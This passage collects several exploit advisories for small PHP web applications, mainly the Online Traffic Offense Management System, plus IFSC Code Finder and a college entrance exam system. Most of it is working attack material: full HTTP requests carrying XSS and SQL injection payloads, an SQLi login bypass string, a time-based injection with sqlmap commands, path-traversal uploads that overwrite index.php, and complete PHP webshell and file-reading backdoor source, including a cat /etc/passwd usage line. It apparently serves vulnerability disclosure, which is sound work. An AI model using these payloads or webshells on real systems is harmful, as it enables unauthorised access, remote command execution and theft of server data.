-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"

hacked
[...]
-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8

UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37
-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the parameter value id

GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1 SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
[...]
-----------------------------------------------------------------------------------------------------------------------
## Example 2
# XSS Stored
# Save the JS payload in the user profile and upload an SVG file through the vulnerable script

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"

1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"

admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"

admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

[...]SVG PAYLOAD[...]
-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1
-----------------------------------------------------------------------------------------------------------------------
# Request: fetch the new user data

GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719

[...]
<div class="form-group col-6">
    <label for="name">First Name</label>
    <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
<div class="form-group col-6">
    <label for="name">Last Name</label>
    <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
[...]
<div class="form-group col-6 d-flex justify-content-center">
    <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
</div>
[...]
-
IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
# Exploit Author: Yash Mahajan
# Date: 2021-10-07
# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
# Version: 1
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
# Tested On: Windows 10, XAMPP
# Vulnerable Parameter: searchifsccode

Steps to Reproduce:

1) Navigate to http://127.0.0.1/ifscfinder/, enter any number in the search field and capture the request in Burp Suite.
2) Paste the request below into Burp Repeater, and also create a txt file and paste this request into it.

Request:
========
POST /ifscfinder/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/ifscfinder/
Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=

--------------------------------------------------------------------------------

3) You will see a time delay of 20 seconds in the response.
4) python sqlmap.py -r request.txt -p searchifsccode --dbs
5) We can retrieve all databases using the sqlmap command above.
-
Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### RCE - Remote Code Execution
# All requests can be sent by both an authenticated and a non-authenticated user
# RCE - we can exploit the RCE vulnerability in several ways:
* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1
# Request sent as Unauthenticated user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"


-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
    system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The file was uploaded to the uploads directory
# Request to list files in uploads\
GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /traffic_offense/uploads</title>
 </head>
 <body>
<h1>Index of /traffic_offense/uploads</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td>
[...]

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell
GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
 Volume in drive C has no label.
 Volume Serial Number is 283C-C6A0

 Directory of C:\xampp\htdocs\traffic_offense\uploads

07.10.2021  10:09    <DIR>          .
07.10.2021  10:09    <DIR>          ..
19.08.2021  09:24            11 426 1629336240_avatar.jpg
20.08.2021  08:58             5 288 1629421080_tl-logo.png
07.10.2021  07:31             3 451 1633584660_xss.svg
07.10.2021  09:59               252 1633593540_cmd.php
07.10.2021  10:02               252 1633593720_cmd.php
07.10.2021  09:02    <DIR>          drivers
               5 File(s)         20 669 bytes
               3 Dir(s)  86 494 085 120 bytes free
</pre>
</BODY></HTML>

-----------------------------------------------------------------------------------------------------------------------

## Example 2
# Webshell as System Logo and next webshell as Portal Cover in System Information page

# Request
POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"

Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"

OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"

<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
    system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream

<?php
if($_GET['file']) {
    $fichero=$_GET['file'];
} else {
    $fichero="/";
}
if($handle = @opendir($fichero)) {
    while($filename = readdir($handle)) {
        echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
    closedir($handle);
} else {
    echo "FILE: " . $fichero . "<br><hr><pre>";
    $fp = fopen($fichero, "r");
    $buffer = fread($fp, filesize($fichero));
    echo $buffer;
    fclose($fp);
}
?>
-----------------------------339921602532596419562348365833--

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------

# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php

## Example 3
# Webshell as photo in driver list page

# Request
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"

vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"

vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"

vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"

vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"

2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"

vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"

vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"

Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"

vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"

vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"

Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"


-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------12210274961293066124133837204--

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to webshell
GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>desktop-uhrf0c6\hubert
</pre>
-
Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Mevlüt Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/entrance_exam/admin/login.php
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /entrance_exam/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/entrance_exam/admin/login.php
Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n

username=admin'+or+'1'%3D'1&password=anything
-
Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation
# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files on the server
* Performing operations by an unauthenticated user with application administrator rights

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - Reading any PHP file from the server
Example vuln scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading rrr.php file from another user on the server
GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close

[...]
</br></br>Hacked file other user in serwer!</br></br>
[...]

-----------------------------------------------------------------------------------------------------------------------

## Example 2 - Saving files to parent and child directories and overwriting files on the server

# Request to read file
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Online Traffic Offense Management System - PHP</title>
[...]

-----------------------------------------------------------------------------------------------------------------------

# Request to overwrite file index.php in the main directory of the webapp
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

<?php echo "Hacked other client files in this hosting!"; ?>
-----------------------------329606699635951312463334027403--

# The new file gets the extension written in filename="fuzzdb.php"
# The new file gets the name and location 5/../../../index, so we can save the file in another directory ;)
# The line must start with a digit
# We can rewrite config files

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------

# Request to read file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
